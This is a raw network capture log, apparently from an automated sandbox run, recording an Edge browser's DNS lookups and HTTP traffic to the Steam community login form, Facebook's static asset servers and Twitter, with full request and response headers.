user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 400

date: Mon, 30 Oct 2023 06:48:16 GMT
perf: 7626143928
server: tsa_o
set-cookie: guest_id=v1%3A169864849694707571; Max-Age=34214400; Expires=Fri, 29 Nov 2024 06:48:16 GMT; Path=/; Domain=.twitter.com; Secure
content-type: text/html; charset=utf-8
x-powered-by: Express
cache-control: no-cache, no-store, max-age=0
x-transaction-id: a4c594b56d5e77ec
x-xss-protection: 0
strict-transport-security: max-age=631138519
content-encoding: gzip
content-length: 1001
x-response-time: 110
x-connection-hash: c906cc9e432422f899eb464c8e8f14cf75ffc01bc0d311e09f7fc2995e3f34c5
DNS

steamcommunity.com

MicrosoftEdge.exe

Remote address:

8.8.8.8:53

Request

steamcommunity.com

IN A

Response

steamcommunity.com

IN A

23.207.106.113
DNS

101.0.85.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

101.0.85.104.in-addr.arpa

IN PTR

Response

101.0.85.104.in-addr.arpa

IN PTR

a104-85-0-101deploystaticakamaitechnologiescom
DNS

35.36.251.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

35.36.251.142.in-addr.arpa

IN PTR

Response

35.36.251.142.in-addr.arpa

IN PTR

ams17s12-in-f31e100net
DNS

1.42.244.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.42.244.104.in-addr.arpa

IN PTR

Response
GET

https://steamcommunity.com/openid/loginform/

MicrosoftEdgeCP.exe

Remote address:

23.207.106.113:443

Request

GET /openid/loginform/ HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
Accept-Encoding: gzip, deflate, br
Host: steamcommunity.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Content-Type: text/html; charset=UTF-8
X-Frame-Options: DENY
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060 https://steamcommunity.com/ https://checkout.steampowered.com/ https://steam.tv/; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/ https://help.steampowered.com/; frame-ancestors 'self' https://steamloopback.host ;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 9262
Date: Mon, 30 Oct 2023 06:48:16 GMT
Connection: keep-alive
Set-Cookie: sessionid=aafc05dcb8e9a84b380d49f9; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=NL%7Cdf992469ad58783256e377c74f856554; Path=/; Secure; HttpOnly; SameSite=None
DNS

static.xx.fbcdn.net

MicrosoftEdge.exe

Remote address:

8.8.8.8:53

Request

static.xx.fbcdn.net

IN A

Response

static.xx.fbcdn.net

IN CNAME

scontent.xx.fbcdn.net

scontent.xx.fbcdn.net

IN A

163.70.151.21
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yl/l/0,cross/R2oOyt8zLzV.css?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

163.70.151.21:443

Request

GET /rsrc.php/v3/yl/l/0,cross/R2oOyt8zLzV.css?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: text/css, */*
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: text/css; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Fri, 25 Oct 2024 05:00:33 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
content-md5: Ri1L771Lnwms1eJFgiNxFQ==
x-fb-debug: 5cTeE9CMVlMHr3U2vXc8+X0+3RedA7GwASK9gdjN6kSVYqN9VotBQAZNGKi5l7yfyjgWVnDteqfPsQc9G5tarQ==
content-length: 1403
date: Mon, 30 Oct 2023 06:48:16 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yK/l/0,cross/b2AilG_Klc4.css?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

163.70.151.21:443

Request

GET /rsrc.php/v3/yK/l/0,cross/b2AilG_Klc4.css?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: text/css, */*
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: text/css; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Thu, 24 Oct 2024 19:52:03 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: phQbnHkpmnjXKat6A/gAJQ==
x-fb-debug: mtftVboaIGEYYIo8OBT0MWU18gzQyG0ofx4ATKbSADbAh1u6LPt2cUl916ci4WQZwoc133njb+fa2vj5Y4kDTw==
content-length: 7462
date: Mon, 30 Oct 2023 06:48:16 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yJ/l/0,cross/n2KZwnfNB_f.css?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

163.70.151.21:443

Request

GET /rsrc.php/v3/yJ/l/0,cross/n2KZwnfNB_f.css?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: text/css, */*
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: text/css; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Mon, 28 Oct 2024 14:18:50 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: kLYuxatAza3qu/ZA9Xyn9g==
x-fb-debug: bwmMthuBQKczbGDCT0VPOq3Pezs8nxGGV/69FM5cZLoYR1QROhAntE7lmCn5zbiEJ1W8+6Oxb2q1uR3AlEBwJA==
content-length: 1180
date: Mon, 30 Oct 2023 06:48:16 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yi/l/0,cross/yotEdcUw9Gj.css?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

163.70.151.21:443

Request

GET /rsrc.php/v3/yi/l/0,cross/yotEdcUw9Gj.css?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: text/css, */*
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: text/css; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Fri, 25 Oct 2024 06:30:22 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: VcVCofLZlfWi6ojYtmNXmg==
x-fb-debug: J9oRwjrn2930XWmaNfO6UGC8/ePRs5jQIbcfFmDLTqTLYRNmIrkSypqsEmblXjnCxbPzMMgV+SOan8bZdPAy4g==
content-length: 3595
date: Mon, 30 Oct 2023 06:48:16 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/y2/l/0,cross/fhrZ5QrtjNj.css?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

163.70.151.21:443

Request

GET /rsrc.php/v3/y2/l/0,cross/fhrZ5QrtjNj.css?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: text/css, */*
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: text/css; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Mon, 28 Oct 2024 14:37:52 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: EH2TF4fSsp5iqNHW9RZuUg==
x-fb-debug: 0DlrBru955/pm8xAmaHonUVBIrhyNWGnW759ChfviEijeuIH3t7Q4hYQvGpCa3OCIEDH1lvEblrRzRN/SZv8TA==
content-length: 1585
date: Mon, 30 Oct 2023 06:48:16 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yl/l/0,cross/X4SsFPrb6Pk.css?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

163.70.151.21:443

Request

GET /rsrc.php/v3/yl/l/0,cross/X4SsFPrb6Pk.css?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: text/css, */*
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: text/css; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Thu, 24 Oct 2024 20:03:23 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: yu1rlLo8FYHgAfst/x0dgg==
x-fb-debug: uDZFLxVn0MhRAxGVA4AQqwEg+DsW8rI7MrLm/uPMvfNZuTU6PAZPwaz+W4y8rkLKojlvLZSF5nNlM9SBRyQXJw==
content-length: 245
date: Mon, 30 Oct 2023 06:48:16 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yR/l/0,cross/G5tcKKPynIe.css?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

163.70.151.21:443

Request

GET /rsrc.php/v3/yR/l/0,cross/G5tcKKPynIe.css?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: text/css, */*
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: text/css; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Sun, 27 Oct 2024 15:01:34 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: /NKl0DwMOqD5uTWDNxLtxQ==
x-fb-debug: GQke9QtCdlVp9UtvJZZ961t535sB5+O2hsUlaWYOo3pYCqwzDFrm7CIS9EYM5whjAxIbY9vYvikLWSqTDABjsQ==
content-length: 529
date: Mon, 30 Oct 2023 06:48:17 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yc/l/0,cross/1FPNULrhhBJ.css?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

163.70.151.21:443

Request

GET /rsrc.php/v3/yc/l/0,cross/1FPNULrhhBJ.css?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: text/css, */*
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: text/css; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Thu, 24 Oct 2024 21:07:19 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: Nvg1ecFWA6xHskDd841InQ==
x-fb-debug: cdYGTeLDwY300LCig9LmFEnPTri7Hg4D5rnzwAfiwMYmGCrz5M04EhXeCbG8eK5zyuRxbiEsPAOiinP/FC2XiQ==
content-length: 489
date: Mon, 30 Oct 2023 06:48:17 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yi/r/Hw6RdThfLzT.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

163.70.151.21:443

Request

GET /rsrc.php/v3/yi/r/Hw6RdThfLzT.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://www.facebook.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-encoding: br
content-type: application/x-javascript; charset=utf-8
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Sat, 26 Oct 2024 18:28:58 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
content-md5: sX1tP6hx9KhGepF7pYFVAA==
x-fb-debug: 1/nFERGt4aBwZfr6At7Tny5/wCFvlYMvh4jH22LytLQbrmRLurPHqXrKwlXV09cTUHBsD1POa1kubER5IdEM9w==
content-length: 104477
date: Mon, 30 Oct 2023 06:48:17 GMT
access-control-allow-origin: https://www.facebook.com
vary: Origin
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3i7M54/yr/l/en_US/Njo6HxqLwOj.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

163.70.151.21:443

Request

GET /rsrc.php/v3i7M54/yr/l/en_US/Njo6HxqLwOj.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Thu, 24 Oct 2024 19:56:20 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
content-md5: Z1ry6+v0yFK5WdcBRI9e/Q==
x-fb-debug: oH9K/uzrYIa811wzWd4fcWfUoHrfq9j9sx7gY4uVs391J6ReRkvZpTf2MwQkmu/enhwoqPjGBJjCkU03Yw8eKQ==
content-length: 14427
date: Mon, 30 Oct 2023 06:48:32 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yp/r/gC0mb5XShS_.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

163.70.151.21:443

Request

GET /rsrc.php/v3/yp/r/gC0mb5XShS_.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Thu, 24 Oct 2024 20:01:12 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: oxOhIUf98vAPhdsTZElQbg==
x-fb-debug: fJc68C1Wbap8ogx85fNPT2BHKQiiH7P1QjdrDHVn3WQThC+xewGYmJGYMdRNH423Upf6euAZTlgRqij+MXm8jg==
content-length: 9624
date: Mon, 30 Oct 2023 06:48:33 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yt/r/v75M7CPu9-P.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

163.70.151.21:443

Request

GET /rsrc.php/v3/yt/r/v75M7CPu9-P.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Sun, 27 Oct 2024 15:01:35 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: Qg7sJKqPfguQDMimuAsFXQ==
x-fb-debug: bDXVcPJj6hT65jr9quqh9Fw93sb8gUAo2OW6byLkqSWhMlXyrYK+U9mtTsXsmJCAYJ30gu9MLsRMNFCM8D91Qw==
content-length: 249
date: Mon, 30 Oct 2023 06:48:33 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yz/r/fiUTTh4d_Lr.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

163.70.151.21:443

Request

GET /rsrc.php/v3/yz/r/fiUTTh4d_Lr.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Sat, 26 Oct 2024 09:15:33 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: wfJUFlnC3nzcjOp5Pt1Rqg==
x-fb-debug: wnYPnqtAaMVYxFkuNhA0FUo2xo3ghSL9ZQuTCEcRzOM+fzL13Ul3i+YaIijnh8cYQ/0Y6Y7gZ03wmdiSOHDyrg==
content-length: 8670
date: Mon, 30 Oct 2023 06:48:33 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yT/r/0ZOQmhGCKxB.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

163.70.151.21:443

Request

GET /rsrc.php/v3/yT/r/0ZOQmhGCKxB.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Sun, 27 Oct 2024 15:01:35 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: KhocWu2P7GO5RUxc9pyOlg==
x-fb-debug: 5XNJToWNXkGyJxVrkUvJms73+1ItrSfYneUlD/HqfYTdi5mFA4sEv5qjXDJJbjFIFyYUDVzMJG+kY81EOGTEYg==
content-length: 385
date: Mon, 30 Oct 2023 06:48:33 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yc/l/0,cross/winPR9Hzn-P.css?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

163.70.151.21:443

Request

GET /rsrc.php/v3/yc/l/0,cross/winPR9Hzn-P.css?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: text/css, */*
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: text/css; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Mon, 28 Oct 2024 14:37:52 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: blxFbguojORfVnQEKVHitA==
x-fb-debug: e+jzI7jolApyCFczwStRiOao7AzGOQY00zBs3LSr0b5s9uYkl+65GRTMdiPh6nLr8FYuLVoJcBg0zYkI9injVA==
content-length: 2628
date: Mon, 30 Oct 2023 06:48:39 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yz/r/1jo5ZChBkzZ.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

163.70.151.21:443

Request

GET /rsrc.php/v3/yz/r/1jo5ZChBkzZ.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Thu, 24 Oct 2024 19:46:37 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
